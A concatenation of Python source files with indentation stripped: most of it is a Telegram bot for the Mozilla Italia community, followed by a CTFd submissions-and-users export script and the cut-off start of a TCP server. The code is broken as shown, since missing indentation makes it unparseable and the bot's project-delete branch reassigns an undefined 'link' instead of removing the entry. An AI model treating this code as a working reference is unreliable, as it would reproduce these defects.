load_progettimozita = [ [InlineKeyboardButton(
text=str(proj), url=liste["progetti_mozita"][proj])] for proj in list(liste["progetti_mozita"].keys()) ]
load_progettimozita.append([InlineKeyboardButton(
text=frasi["button_mostra_help"], callback_data='/help')])
progettimozita = InlineKeyboardMarkup(inline_keyboard=load_progettimozita)
regolamento = InlineKeyboardMarkup(inline_keyboard=[
[InlineKeyboardButton(text=frasi["button_regolamento"],
url=link_regolamento)],
[InlineKeyboardButton(
text=frasi["button_mostra_help"], callback_data='/help')],
])
avvisi = InlineKeyboardMarkup(inline_keyboard=[
[InlineKeyboardButton(text=frasi["button_avvisi"], callback_data="/avvisiOn"),
InlineKeyboardButton(text=frasi["button_avvisi2"], callback_data="/avvisiOff")],
[InlineKeyboardButton(
text=frasi["button_mostra_help"], callback_data='/help')],
])
# aggiungere instagram in futuro
load_social = []
load_social = [ [InlineKeyboardButton(
text=social, url=liste["social"][social])] for social in list(liste["social"].keys()) ]
load_social.append([InlineKeyboardButton(
text=frasi["button_mostra_help"], callback_data='/help')])
social = InlineKeyboardMarkup(inline_keyboard=load_social)
admin = False
collaboratori_stampa = ""
for k, v in liste["collaboratori"].items():
collaboratori_stampa += k + " - " + v + "\n"
if chat_id not in all_users:
all_users.append(chat_id)
avvisi_on_list.append(user_id)
try:
with open(all_users_path, "wb") as file_with:
file_with.write(json.dumps(all_users).encode("utf-8"))
except Exception as exception_value:
print("Excep:03 -> " + str(exception_value))
log("Except:03 ->" + str(exception_value), True)
try:
with open(avvisi_on_list_path, "wb") as file_with:
file_with.write(json.dumps(avvisi_on_list).encode("utf-8"))
except Exception as exception_value:
print("Excep:04 -> " + str(exception_value))
log("Except:04 ->" + str(exception_value), True)
if user_id in avvisi_on_list:
stato_avvisi = frasi["avvisiStatoOn"]
else:
stato_avvisi = frasi["avvisiStatoOff"]
if text.lower() == "/home":
bot.sendMessage(chat_id, frasi["home"],
reply_markup=home, parse_mode="HTML")
elif text.lower() == "/start":
bot.sendMessage(chat_id, frasi["start"], parse_mode="HTML")
bot.sendMessage(chat_id, frasi["start2"],
reply_markup=start, parse_mode="HTML")
if nousername:
bot.sendMessage(
chat_id, frasi["start_nousername"], parse_mode="HTML")
elif text.lower() == "/supporto":
bot.sendMessage(chat_id, frasi["supporto"],
reply_markup=supporto, parse_mode="HTML")
elif text.lower() == "/gruppi":
bot.sendMessage(chat_id, frasi["gruppi"],
reply_markup=gruppi, parse_mode="HTML")
elif text.lower() == "/vademecum":
bot.sendMessage(chat_id, frasi["vademecum"],
reply_markup=vademecum, parse_mode="HTML")
elif text.lower() == "/vademecumGenerale".lower():
bot.sendMessage(chat_id, frasi["invio_vg_in_corso"], parse_mode="HTML")
bot.sendDocument(chat_id, open("VG.pdf", "rb"))
elif text.lower() == "/vademecumTecnico".lower():
bot.sendMessage(chat_id, frasi["invio_vt_in_corso"], parse_mode="HTML")
bot.sendDocument(chat_id, open("VT.pdf", "rb"))
elif text.lower() == "/vademecumCV".lower():
bot.sendMessage(chat_id, frasi["invio_cv_in_corso"], parse_mode="HTML")
bot.sendDocument(chat_id, open("CV.pdf", "rb"))
elif text.lower() == "/feedback":
bot.sendMessage(chat_id, frasi["feedback"],
reply_markup=feedback, parse_mode="HTML")
elif text.lower() == "/help" or text == "/aiuto":
bot.sendMessage(chat_id, frasi["help"], parse_mode="HTML")
bot.sendMessage(chat_id, frasi["help2"],
reply_markup=help, parse_mode="HTML")
elif text.lower() == "/news":
bot.sendMessage(chat_id, frasi["news"],
reply_markup=news, parse_mode="HTML")
elif text.lower() == "/info":
bot.sendMessage(
chat_id,
str(
((frasi["info"]).replace(
"{{**versione**}}",
str(versione))).replace(
"{{**ultimo_aggiornamento**}}",
str(ultimo_aggiornamento))).replace(
"{{**collaboratori_stampa**}}",
str(collaboratori_stampa)),
parse_mode="HTML")
elif text.lower() == "/forum":
bot.sendMessage(chat_id, frasi["forum"],
reply_markup=forum, parse_mode="HTML")
elif text.lower() == "/developers":
bot.sendMessage(chat_id, frasi["developers"],
reply_markup=developers, parse_mode="HTML")
elif text.lower() == "/dem":
bot.sendMessage(chat_id, frasi["design_marketing"],
reply_markup=design_marketing, parse_mode="HTML")
elif text.lower() == "/l10n":
bot.sendMessage(chat_id, frasi["L10n"],
reply_markup=L10n, parse_mode="HTML")
elif text.lower() == "/call" or text.lower() == "/meeting":
bot.sendMessage(chat_id, frasi["call"],
reply_markup=call, parse_mode="HTML")
elif text.lower() == "/prossimacall" or text.lower() == "/prossimoMeeting".lower():
bot.sendMessage(
chat_id,
str(
((frasi["prossima_call"]).replace(
"{{**giorno_call**}}",
str(giorno_call))).replace(
"{{**mese_call**}}",
str(mese_call))).replace(
"{{**anno_call**}}",
str(anno_call)),
parse_mode="HTML")
elif text.lower() == "/progetti":
bot.sendMessage(chat_id, frasi["progetti"],
reply_markup=progetti, parse_mode="HTML")
bot.sendMessage(
chat_id,
frasi["progetti2"],
reply_markup=progettimozita,
parse_mode="HTML")
elif text.lower() == "/regolamento":
bot.sendMessage(chat_id, frasi["regolamento"],
reply_markup=regolamento, parse_mode="HTML")
elif text.lower() == "/avvisi":
bot.sendMessage(chat_id, str(frasi["avvisi"]).replace(
"{{**stato_avvisi**}}", str(stato_avvisi)), reply_markup=avvisi, parse_mode="HTML")
elif text.lower() == "/avvisiOn".lower():
if not (user_id in avvisi_on_list):
avvisi_on_list.append(user_id)
try:
with open(avvisi_on_list_path, "wb") as file_with:
file_with.write(json.dumps(avvisi_on_list).encode("utf-8"))
bot.sendMessage(chat_id, frasi["avvisiOn"], parse_mode="HTML")
except Exception as exception_value:
print("Excep:05 -> " + str(exception_value))
log("Except:05 ->" + str(exception_value), True)
bot.sendMessage(chat_id, frasi["avvisiOn2"], parse_mode="HTML")
else:
bot.sendMessage(chat_id, frasi["avvisiOn3"], parse_mode="HTML")
elif text.lower() == "/avvisiOff".lower():
if user_id in avvisi_on_list:
avvisi_on_list.remove(user_id)
try:
with open(avvisi_on_list_path, "wb") as file_with:
file_with.write(json.dumps(avvisi_on_list).encode("utf-8"))
bot.sendMessage(chat_id, frasi["avvisiOff"], parse_mode="HTML")
except Exception as exception_value:
print("Excep:06 -> " + str(exception_value))
log("Except:06 ->" + str(exception_value), True)
bot.sendMessage(
chat_id, frasi["avvisiOff2"], parse_mode="HTML")
else:
bot.sendMessage(chat_id, frasi["avvisiOff3"])
elif text.lower() == "/social".lower():
bot.sendMessage(chat_id, frasi["social"],
reply_markup=social, parse_mode="HTML")
elif "/admin" in text.lower():
if status_user == "A":
if type_msg == "LK":
admin = True
else:
bot.sendMessage(chat_id, frasi["non_sei_admin"], parse_mode="HTML")
else:
bot.sendMessage(
chat_id,
frasi["comando_non_riconosciuto"],
reply_markup=start,
parse_mode="HTML")
if type_msg == "BIC" and query_id != "-":
bot.answerCallbackQuery(query_id,
cache_time=0) # se voglio mostrare un messaggio a scomparsa: bot.answerCallbackQuery(chat_id, text="Testo (0-200 caratteri)" cache_time=0)
if admin:
# CONTROLLO AZIONI ADMIN
azione = list(text.split(" "))
admin_err1 = False
if azione[0].lower() == "/admin" and len(azione) >= 1:
if len(azione) == 1 or (azione[1].lower() == "help" and len(azione) == 2):
# Elenco azioni
bot.sendMessage(chat_id,
"Questo è l'elenco dei comandi che puoi eseguire:\n" +
"\n\n" +
"<b>Generali</b>:\n"
"- <code>/admin avviso |Messaggio da inviare|</code>\n" +
"- <code>/admin avviso preview |Messaggio da inviare|</code>\n <i>Anteprima del messaggio da inviare, per verificare che tutto venga visualizzato correttamente</i>\n" +
"- <code>/admin all users |Messaggio importante da inviare|</code>\n <i>Solo per messaggi importanti, altrimenti usare 'avviso'</i>\n" +
"\n" +
"<b>Gestione lista degli iscritti agli avvisi</b>\n" +
"- <code>/admin avvisi list mostra</code>\n" +
"- <code>/admin avvisi list aggiungi |Id chat|</code>\n" +
"- <code>/admin avvisi list elimina |Id chat|</code>\n" +
"\n" +
"<b>Gestione canali</b>:\n" +
"- <code>/admin canale mostra</code>\n" +
"- <code>/admin canale aggiungi |Username canale|</code>\n" +
"- <code>/admin canale elimina |Username canale|</code>\n" +
"- <code>/admin canale preview |Username canale| |Messaggio da inviare in un canale|</code>\n <i>Anteprima del messaggio da inviare, per verificare che tutto venga visualizzato correttamente</i>\n" +
"- <code>/admin canale |Username canale| |Messaggio da inviare in un canale|</code>\n" +
"- <code>/admin canale broadcast |Messaggio da inviare in tutti i canali|</code>\n" +
"\n" +
"<b>Gestione progetti (Mozilla)</b>:\n" +
"- <code>/admin progetto aggiungi |Nome progetto da aggiungere| |LinkProgetto|</code>\n" +
"- <code>/admin progetto modifica |Nome progetto da modificare| |LinkProgettoModificato|</code>\n" +
"- <code>/admin progetto elimina |Nome progetto da eliminare|</code>\n" +
"\n" +
"<b>Gestione progetti Mozilla Italia</b>:\n" +
"- <code>/admin progetto mozita aggiungi |Nome progetto comunitario da aggiungere| |LinkProgetto|</code>\n" +
"- <code>/admin progetto mozita modifica |Nome progetto comunitario da modificare| |LinkProgettoModificato|</code>\n" +
"- <code>/admin progetto mozita elimina |Nome progetto comunitario da eliminare|</code>\n" +
"\n" +
"<b>Gestione collaboratori di MozItaBot</b>:\n" +
"- <code>/admin collaboratore aggiungi |Nome Cognome (@usernameTelegram)|</code>\n" +
"- <code>/admin collaboratore elimina |Nome Cognome (@usernameTelegram)|</code>\n" +
"\n" +
"<b>Scaricare file log di MozItaBot</b>:\n" +
"- <code>/admin scarica |ANNO| |MESE| |GIORNO|</code>\n" +
"- <code>/admin scarica today</code>\n" +
"- <code>/admin scarica yesterday</code>\n" +
"\n" +
"<b>Esempi:</b>\n" +
"- <code>/admin avviso Messaggio di prova</code>\n" +
"- <code>/admin call aggiungi Nome call di esempio 2019 https://mozillaitalia.it</code>\n" +
"- <code>/admin scarica 2019 10 09</code>",
parse_mode="HTML")
# ======
# AVVISO
# ======
elif azione[1].lower() == "avviso" and len(azione) >= 3:
# Azioni sugli avvisi
del azione[0]
del azione[0]
# Syntax : /admin avviso preview |Messaggio da inviare|
if azione[0].lower() == "preview" and len(azione) >= 4:
del azione[0]
messaggio = ' '.join(azione)
try:
bot.sendMessage(
chat_id,
"<b>‼️‼️ ||PREVIEW DEL MESSAGGIO|| ‼️‼</b>️\n\n" +
messaggio +
"\n\n--------------------\n" +
frasi["footer_messaggio_avviso"],
parse_mode="HTML")
except Exception as exception_value:
print("Excep:23 -> " + str(exception_value))
log("Except:23 ->" + str(exception_value), True)
bot.sendMessage(
chat_id,
"‼️ <b>ERRORE</b>: il messaggio contiene degli errori di sintassi.\n" +
"Verificare di avere <b>chiuso</b> tutti i tag usati.",
parse_mode="HTML")
else:
# Syntax : /admin avviso |Messaggio da inviare|
messaggio = ' '.join(azione)
error08 = False
bot.sendMessage(
chat_id,
"<i>Invio del messaggio in corso...\nRiceverai un messaggio quando finisce l'invio.</i>",
parse_mode="HTML")
remove_these_users = []
for value_for in avvisi_on_list:
time.sleep(.3)
try:
bot.sendMessage(
value_for,
messaggio +
"\n\n--------------------\n" +
frasi["footer_messaggio_avviso"],
parse_mode="HTML")
print(" >> Messaggio inviato alla chat: " + str(value_for))
'''
bot.sendMessage(
chat_id,
"✔️ Messaggio inviato alla chat: <a href='tg://user?id=" + str(value_for) + "'>" +
str(value_for) + "</a>",
parse_mode="HTML")
'''
except Exception as exception_value:
print("Excep:08 -> " + str(exception_value))
log("Except:08 ->" +
str(exception_value), True)
remove_these_users.append(value_for)
error08 = True
for value_to_remove in remove_these_users:
remove_user_from_avvisi_allusers_lists(
chat_id, value_to_remove)
if (not error08):
bot.sendMessage(
chat_id,
"Messaggio inviato correttamente a tutti gli utenti iscritti alle news.\n\nIl messaggio inviato è:\n" +
messaggio,
parse_mode="HTML")
else:
bot.sendMessage(
chat_id,
"Messaggio inviato correttamente ad alcune chat.\n\nIl messaggio inviato è:\n" +
messaggio,
parse_mode="HTML")
# canale => gestisce i canali
# syntax: /admin canale mostra
# OPPURE
# syntax: /admin canale lista
elif azione[1].lower() == "canale" and len(azione) >= 3:
del azione[0]
del azione[0]
# shows channels saved on file
# everytime it reloads the file to avoid uncommon situations
if azione[0] == "mostra" or azione[0] == "lista" and len(azione) == 1:
channels_list = list(liste["channels"].keys())
bot.sendMessage(
chat_id, "Lista canali disponibili:\n{}".format(channels_list))
# preview messaggio canale => non invia il messaggio
# syntax: /admin canale preview |canale||messaggio|
elif len(azione) >= 4 and azione[0].lower() == "preview":
# delete all the part not-related to the message (preview)
del azione[0]
# saves channel name
ch = azione[0]
del azione[0]
messaggio = ' '.join(azione)
if messaggio != "":
try:
bot.sendMessage(
chat_id,
"<b>== PREVIEW DEL MESSAGGIO ==</b>️\n" +
"<i>Questo messaggio sarà inoltrato in: <code>" + ch + "</code></i>️\n\n"+
messaggio + "\n",
parse_mode="HTML")
except Exception as exception_value:
print("Excep:26 -> " + str(exception_value))
log("Except:26 ->" +
str(exception_value), True)
bot.sendMessage(
chat_id,
"‼️ <b>ERRORE</b>: il messaggio contiene degli errori di sintassi.\n" +
"Verificare di avere <b>chiuso</b> tutti i tag usati.",
parse_mode="HTML")
else:
bot.sendMessage(
chat_id,
"‼️ <b>ERRORE</b>: La preview è vuota! Assicurati di inserire un messaggio " +
"e riprova",
parse_mode="HTML")
print("La preview non può essere vuota.")
# adds a channel in a file
# syntax /admin canale aggiungi |username canale | descrizione |
elif azione[0].lower() == "aggiungi" and len(azione) == 2:
# lets fix the username by adding @ at the beginning if not present
fixed_username = fix_username(azione[1]).lower()
# manage the case the user doesn't put anything
# TODO: let the user choice the name
# lets check if username is not present in the channel_list
if fixed_username not in liste["channels"]:
try:
liste["channels"][fixed_username] = "undefined"
updateJSON(liste, lists_path)
bot.sendMessage(
chat_id, "Canale <code>{}</code> aggiunto correttamente".format(fixed_username), parse_mode="HTML")
except Exception as exception_value:
print("Excep:28 -> {}".format(exception_value))
log("Except:28 -> {}".format(exception_value), True)
bot.sendMessage(
chat_id, "Il canale <code>{}</code> non è stato aggiunto in lista".format(fixed_username), parse_mode="HTML")
else:
print("Il canale " + fixed_username + " è già presente!")
bot.sendMessage(
chat_id, "Il canale <code>{}</code> è già presente nella lista!".format(fixed_username), parse_mode="HTML")
# removes a channel in a file
# syntax /admin canale elimina |username canale| IN ALTERNATIVA
# syntax /admin canale rimuovi |username canale|
elif azione[0].lower() == "elimina" or azione[0].lower() == "rimuovi" and len(azione) == 2:
try:
liste["channels"].pop(fix_username(azione[1]))
updateJSON(liste, lists_path)
bot.sendMessage(
chat_id, "Canale <code>{}</code> rimosso correttamente".format(azione[1].lower()), parse_mode="HTML")
except Exception as exception_value:
print("Excep:28 -> {}".format(exception_value))
log("Except:28 -> {}".format(exception_value), True)
bot.sendMessage(
chat_id, "Il canale <code>{}</code> non è stato rimosso dalla lista".format(azione[1].lower()), parse_mode="HTML")
# canale |canale| |messaggio| => invia il messaggio a quel canale
# syntax: /admin canale | canale | |Messaggio da inviare in un canale|"
# syntax: /admin canale broadcast |Messaggio da inviare in tutti i canali|"
elif len(azione) >= 2 or len(azione) >= 1:
messaggio = ""
# check: empty channels
if len(liste["channels"]) == 0:
bot.sendMessage(
chat_id,
"Lista canali vuota! Impossibile inviare un messaggio!",
parse_mode="HTML")
print("Lista canali vuota! Impossibile inviare un messaggio!")
else:
if azione[0].lower() == "broadcast":
del azione[0]
messaggio = ' '.join(azione)
if messaggio != "":
for channel_name in liste["channels"].keys():
send_message_channel(
channel_name, messaggio, chat_id, "Messaggio non inviato in ")
else:
bot.sendMessage(
chat_id,
"Messaggio vuoto. Impossibile procedere.",
parse_mode="HTML")
print("Messaggio vuoto. Impossibile procedere.")
else:
# it is not a broadcast message
channel_name = fix_username(azione[0])
del azione[0]
messaggio = ' '.join(azione)
if messaggio != "":
send_message_channel(
channel_name, messaggio, chat_id)
else:
bot.sendMessage(
chat_id,
"Messaggio vuoto. Impossibile procedere.",
parse_mode="HTML")
else:
print("Comando non riconosciuto.")
admin_err1 = True
# /admin all users
elif azione[1].lower() == "all" and azione[2].lower() == "users" and len(azione) >= 4:
# Azioni sugli avvisi importanti (tutti gli utenti)
del azione[0]
del azione[0]
del azione[0]
messaggio = ' '.join(azione)
bot.sendMessage(
chat_id,
"<i>Invio del messaggio in corso...\nRiceverai un messaggio quando finisce l'invio.</i>",
parse_mode="HTML")
remove_these_users = []
for value_for in all_users:
time.sleep(.3)
try:
bot.sendMessage(
value_for,
"<b>Messaggio importante</b>\n" + messaggio,
parse_mode="HTML")
print(" >> Messaggio inviato alla chat: " + str(value_for))
'''bot.sendMessage(
chat_id, "✔️ Messaggio inviato alla chat: <a href='tg://user?id=" + str(value_for) + "'>" +
str(value_for) + "</a>",
parse_mode="HTML")'''
except Exception as exception_value:
print("Excep:07 -> " + str(exception_value))
log("Except:07 ->" +
str(exception_value), True)
remove_these_users.append(value_for)
for value_to_remove in remove_these_users:
remove_user_from_avvisi_allusers_lists(
chat_id, value_to_remove)
bot.sendMessage(
chat_id,
"Messaggio inviato correttamente a tutti gli utenti.\n\nIl messaggio inviato è:\n" +
messaggio,
parse_mode="HTML")
elif azione[1].lower() == "avvisi" and azione[2].lower() == "list" and len(azione) >= 4:
# Azioni sugli utenti (chat_id) presenti in avvisi_on_list.json
if azione[3].lower() == "mostra":
bot.sendMessage(
chat_id, "Ecco la 'avvisi_on_list':\n\n" + str(avvisi_on_list))
elif azione[3].lower() == "aggiungi":
del azione[0]
del azione[0]
del azione[0]
del azione[0]
temp_chat_id = int(azione[0])
if temp_chat_id not in avvisi_on_list:
avvisi_on_list.append(temp_chat_id)
try:
with open(avvisi_on_list_path, "wb") as file_with:
file_with.write(json.dumps(
avvisi_on_list).encode("utf-8"))
bot.sendMessage(
chat_id,
"La chat_id '" +
str(temp_chat_id) +
"' è stata inserita correttamente.")
except Exception as exception_value:
print("Excep:12 -> " + str(exception_value))
log("Except:12 ->" +
str(exception_value), True)
bot.sendMessage(
chat_id,
"Si è verificato un errore inaspettato e non è possibile salvare 'avvisi_on_list.json'.")
else:
bot.sendMessage(
chat_id,
"La chat_id '" +
str(temp_chat_id) +
"' è già presente.")
elif azione[3].lower() == "elimina":
del azione[0]
del azione[0]
del azione[0]
del azione[0]
temp_chat_id = int(azione[0])
if temp_chat_id in avvisi_on_list:
avvisi_on_list.remove(temp_chat_id)
try:
with open(avvisi_on_list_path, "wb") as file_with:
file_with.write(json.dumps(
avvisi_on_list).encode("utf-8"))
bot.sendMessage(
chat_id,
"La chat_id '" +
str(temp_chat_id) +
"' è stata eliminata correttamente.")
except Exception as exception_value:
print("Excep:13 -> " + str(exception_value))
log("Except:13 ->" +
str(exception_value), True)
bot.sendMessage(
chat_id,
"Si è verificato un errore inaspettato e non è possibile salvare 'avvisi_on_list.json'.")
else:
bot.sendMessage(
chat_id,
"La chat_id '" +
str(temp_chat_id) +
"' non è stata trovata.")
else:
admin_err1 = True
elif azione[1].lower() == "progetto" and azione[2].lower() == "mozita" and len(azione) >= 5:
# Azioni sui progetti comunitari (mozilla italia)
if azione[3].lower() == "aggiungi":
del azione[0]
del azione[0]
del azione[0]
del azione[0]
link = azione[-1]
del azione[-1]
nome = ' '.join(azione)
if not nome in liste["progetti_mozita"]:
liste["progetti_mozita"][nome] = str(link)
try:
updateJSON(liste, lists_path)
bot.sendMessage(
chat_id,
"Progetto comunitario '" +
str(nome) +
"' (" +
str(link) +
") inserito correttamente.")
except Exception as exception_value:
print("Excep:17 -> " + str(exception_value))
log("Except:17 ->" +
str(exception_value), True)
bot.sendMessage(
chat_id,
"Si è verificato un errore inaspettato e non è possibile salvare 'progetti_mozita_list.json'.")
else:
bot.sendMessage(chat_id, "Il progetto comunitario '" +
str(nome) + "' è già presente.")
elif azione[3].lower() == "modifica":
del azione[0]
del azione[0]
del azione[0]
del azione[0]
link = azione[-1]
del azione[-1]
nome = ' '.join(azione)
if nome in liste["progetti_mozita"]:
liste["progetti_mozita"][nome] = str(link)
try:
updateJSON(liste, lists_path)
bot.sendMessage(
chat_id,
"Progetto '" +
str(nome) +
"' (" +
str(link) +
") modificato correttamente.")
except Exception as exception_value:
print("Excep:18 -> " + str(exception_value))
log("Except:18 ->" +
str(exception_value), True)
bot.sendMessage(
chat_id,
"Si è verificato un errore inaspettato e non è possibile salvare 'progetti_mozita_list.json'.")
else:
bot.sendMessage(chat_id, "Il progetto comunitario '" +
str(nome) + "' non è stato trovato.")
elif azione[3].lower() == "elimina":
del azione[0]
del azione[0]
del azione[0]
del azione[0]
nome = ' '.join(azione)
if nome in liste["progetti_mozita"]:
liste["progetti_mozita"].pop(nome)
try:
updateJSON(liste, lists_path)
bot.sendMessage(
chat_id, "Progetto comunitario '" + str(nome) + "' eliminato correttamente.")
except Exception as exception_value:
print("Excep:19 -> " + str(exception_value))
log("Except:19 ->" +
str(exception_value), True)
bot.sendMessage(
chat_id,
"Si è verificato un errore inaspettato e non è possibile salvare 'progetti_mozita_list.json'.")
else:
bot.sendMessage(chat_id, "Il progetto '" +
str(nome) + "' non è stato trovato.")
else:
admin_err1 = True
elif azione[1].lower() == "progetto" and len(azione) >= 4:
# Azione sui progetti (mozilla)
if azione[2] == "aggiungi":
del azione[0]
del azione[0]
del azione[0]
link = azione[-1]
del azione[-1]
nome = ' '.join(azione)
if not nome in liste["progetti"]:
liste["progetti"][nome] = str(link)
try:
updateJSON(liste, lists_path)
bot.sendMessage(
chat_id,
"Progetto '" +
str(nome) +
"' (" +
str(link) +
") inserito correttamente.")
except Exception as exception_value:
print("Excep:17 -> " + str(exception_value))
log("Except:17 ->" +
str(exception_value), True)
bot.sendMessage(
chat_id,
"Si è verificato un errore inaspettato e non è possibile salvare 'progetti_list.json'.")
else:
bot.sendMessage(chat_id, "Il progetto '" +
str(nome) + "' è già presente.")
elif azione[2].lower() == "modifica":
del azione[0]
del azione[0]
del azione[0]
link = azione[-1]
del azione[-1]
nome = ' '.join(azione)
if nome in liste["progetti"]:
liste["progetti"][nome] = str(link)
try:
updateJSON(liste, lists_path)
bot.sendMessage(
chat_id,
"Progetto '" +
str(nome) +
"' (" +
str(link) +
") modificato correttamente.")
except Exception as exception_value:
print("Excep:18 -> " + str(exception_value))
log("Except:18 ->" +
str(exception_value), True)
bot.sendMessage(
chat_id,
"Si è verificato un errore inaspettato e non è possibile salvare 'progetti_list.json'.")
else:
bot.sendMessage(chat_id, "Il progetto '" +
str(nome) + "' non è stato trovato.")
elif azione[2].lower() == "elimina":
del azione[0]
del azione[0]
del azione[0]
nome = ' '.join(azione)
if nome in liste["progetti"]:
liste["progetti"][nome] = str(link)
try:
updateJSON(liste, lists_path)
bot.sendMessage(
chat_id, "Progetto '" + str(nome) + "' eliminato correttamente.")
except Exception as exception_value:
print("Excep:19 -> " + str(exception_value))
log("Except:19 ->" +
str(exception_value), True)
bot.sendMessage(
chat_id,
"Si è verificato un errore inaspettato e non è possibile salvare 'progetti_list.json'.")
else:
bot.sendMessage(chat_id, "Il progetto '" +
str(nome) + "' non è stato trovato.")
else:
admin_err1 = True
elif azione[1].lower() == "collaboratore":
# Azione sui collaboratori
if azione[2].lower() == "aggiungi" and len(azione) >= 5:
del azione[0]
del azione[0]
del azione[0]
username = azione[-1]
del azione[-1]
nome = ' '.join(azione)
if not username in liste["collaboratori"]:
liste["collaboratori"][fix_username(username)] = str(nome)
try:
updateJSON(liste, lists_path)
bot.sendMessage(
chat_id, "'" + str(nome) + "' aggiunto correttamente ai collaboratori.")
except Exception as exception_value:
print("Excep:20 -> " + str(exception_value))
log("Except:20 ->" +
str(exception_value), True)
bot.sendMessage(
chat_id,
"Si è verificato un errore inaspettato e non è possibile salvare 'collaboratori_hub.json'.")
else:
bot.sendMessage(chat_id, "'" + str(nome) + "' è già presente nella lista dei collaboratori.")
elif azione[2].lower() == "elimina" or azione[2].lower() == "rimuovi":
del azione[0]
del azione[0]
del azione[0]
username = ' '.join(azione)
if fix_username(username) in liste["collaboratori"]:
liste["collaboratori"].pop(fix_username(username))
try:
updateJSON(liste, lists_path)
bot.sendMessage(
chat_id, "'" + str(username) + "' rimosso correttamente dai collaboratori.")
except Exception as exception_value:
print("Excep:21 -> " + str(exception_value))
log("Except:21 ->" +
str(exception_value), True)
bot.sendMessage(
chat_id,
"Si è verificato un errore inaspettato e non è possibile salvare 'collaboratori_hub.json'.")
else:
bot.sendMessage(
chat_id, "'" + str(username) + "' non è presente nella lista dei collaboratori.")
else:
admin_err1 = True
elif azione[1].lower() == "scarica" and len(azione) == 5:
# Azione per scaricare file di log -> esempio: /admin scarica 2019 10 20
nome_file = "log_" + azione[2] + "_" + \
azione[3] + "_" + azione[4] + ".txt"
send_log(nome_file, chat_id)
elif azione[1].lower() == "scarica" and azione[2].lower() == "today":
# Azione per scaricare file di log di oggi
nome_file = "log_" + data_salvataggio + ".txt"
send_log(nome_file, chat_id)
elif azione[1].lower() == "scarica" and azione[2].lower() == "yesterday":
# Azione per scaricare file di log di ieri
yesterday_time = datetime.now() - timedelta(days = 1)
data_ieri = yesterday_time.strftime("%Y_%m_%d")
nome_file = "log_" + data_ieri + ".txt"
send_log(nome_file, chat_id)
else:
admin_err1 = True
else:
bot.sendMessage(
chat_id,
"Errore: Comando non riconosciuto.\nPer scoprire tutti i comandi consentiti in questa sezione digita /admin",
parse_mode="HTML")
if admin_err1:
bot.sendMessage(
chat_id,
"Questo comando nella sezione ADMIN non è stato riconosciuto.\n\nPer scoprire tutti i comandi consentiti in questa sezione digita /admin",
parse_mode="HTML")
try:
# stringa stampata a terminale, per ogni operazione effettuata
stampa = str(localtime) + " -- Utente: " + str(user_name) + " (" + str(user_id) + ")[" + str(
status_user) + "] -- Chat: " + str(
chat_id) + "\n >> >> Tipo messaggio: " + str(type_msg) + "\n >> >> Contenuto messaggio: " + str(
text)
print(stampa + "\n--------------------\n")
log(stampa, False)
except Exception as exception_value:
stampa = "Excep:01 -> " + \
str(exception_value) + "\n--------------------\n"
print(stampa)
log("Except:01 ->" + str(exception_value), True)
try:
bot = telepot.Bot(TOKEN)
MessageLoop(
bot, {'chat': risposte, 'callback_query': risposte}).run_as_thread()
except Exception as exception_value:
print("ERRORE GENERALE.\n\nError: " +
str(exception_value) + "\n--------------------\n")
log("ERRORE GENERALE.\n\nError: " + str(exception_value), True)
# keeps the bot alive
while True:
pass
|
ctfdumper.py | import requests, queue, re, urllib.parse, json, threading, tqdm, time
import pandas as pd
class CTFDumper:
def __init__(self, url, threads=10):
self.url = url
self.threads_num = threads
self.tasks = queue.Queue()
self.results_submissions = queue.Queue()
self.results_users = queue.Queue()
def _worker(self):
def get_submission_data(submission_task):
page_num = submission_task['page_num']
r = self._s.get(self.url + '/api/v1/submissions?page={}'.format(page_num))
try:
results = json.loads(r.text)
except:
return
data = results['data']
parsed_submissions = []
for entry_data in data:
parsed_submissions.append({
'user_id' : entry_data['user_id'],
'challenge_name' : entry_data['challenge']['name'],
'challenge_category' : entry_data['challenge']['category'],
'type' : entry_data['type'],
'provided': entry_data['provided'],
'date' : entry_data['date']
})
self.results_submissions.put((parsed_submissions))
def get_username(userid_task):
user_page = userid_task['user_page']
r = self._s.get(self.url + '/api/v1/users?page={}'.format(user_page))
try:
results = json.loads(r.text)
except:
return
for user_data in results['data']:
self.results_users.put((user_data['id'], user_data['name']))
while True:
task = self.tasks.get()
if task == None:
break
if "page_num" in task:
get_submission_data(task)
else:
get_username(task)
self.tasks.task_done()
def get_submissions(self, username, password):
self._s = requests.session()
r = self._s.get(self.url + "/login")
nonce = re.search(r'<input id="nonce" name="nonce" type="hidden" value="(.*?)">', r.text).group(1)
payload = {
"name" : username,
"password" : password,
"_submit" : "Submit",
"nonce" : nonce
}
r = self._s.post(self.url + "/login",
params={'next' : '/challenges'},
data=payload)
if not r.ok or urllib.parse.urlparse(r.url).path != '/challenges':
raise Exception("Could not login to the CTFD site: {}".format(self.url))
r = self._s.get(self.url + "/api/v1/submissions")
if r.status_code != 200:
raise Exception("Could not access submission api endpoint! You probably do not have access.")
total_pages = json.loads(r.text)['meta']['pagination']['pages']
r = self._s.get(self.url + "/api/v1/users")
if r.status_code != 200:
raise Exception("Could not access submission users endpoint! You probably do not have access.")
total_user_pages = json.loads(r.text)['meta']['pagination']['pages']
total_tasks = total_pages + total_user_pages
prog_bar = tqdm.tqdm(total=total_tasks)
threads = [threading.Thread(target=self._worker, daemon=True) for _i in range(self.threads_num)]
[t.start() for t in threads]
for page_num in range(1, total_pages+1):
self.tasks.put(({'page_num' : page_num}))
for user_page in range(1, total_user_pages+1):
self.tasks.put(({'user_page' : user_page}))
prev_tasks_done = total_tasks
while True:
curr_tasks_left = self.tasks.qsize()
prog_bar.update(prev_tasks_done - curr_tasks_left)
prog_bar.refresh()
if curr_tasks_left == 0:
break
prev_tasks_done = curr_tasks_left
time.sleep(0.0001)
self.tasks.join()
[self.tasks.put((None)) for _t in threads]
[t.join() for t in threads]
user_map = {}
while self.results_users.qsize() > 0:
id_to_name = self.results_users.get()
user_map[id_to_name[0]] = id_to_name[1]
self.results_users.task_done()
if self.results_submissions.qsize() <= 0:
[t.join() for t in threads]
return None
pre_submission_list = self.results_submissions.get()
post_submission_list = []
for submission_data in pre_submission_list:
try:
submission_data['username'] = user_map[submission_data['user_id']]
post_submission_list.append(submission_data)
except:
pass
result_df = pd.DataFrame(post_submission_list)
self.results_submissions.task_done()
while self.results_submissions.qsize() > 0:
pre_submission_list = self.results_submissions.get()
post_submission_list = []
for submission_data in pre_submission_list:
try:
submission_data['username'] = user_map[submission_data['user_id']]
post_submission_list.append(submission_data)
except:
pass
df = pd.DataFrame(post_submission_list)
result_df = result_df.append(df, ignore_index=True)
self.results_submissions.task_done()
return result_df
|
TCP_server_asyncio.py | import socket
import threading
import asyncio
import platform
class Server:
def __init__(self):
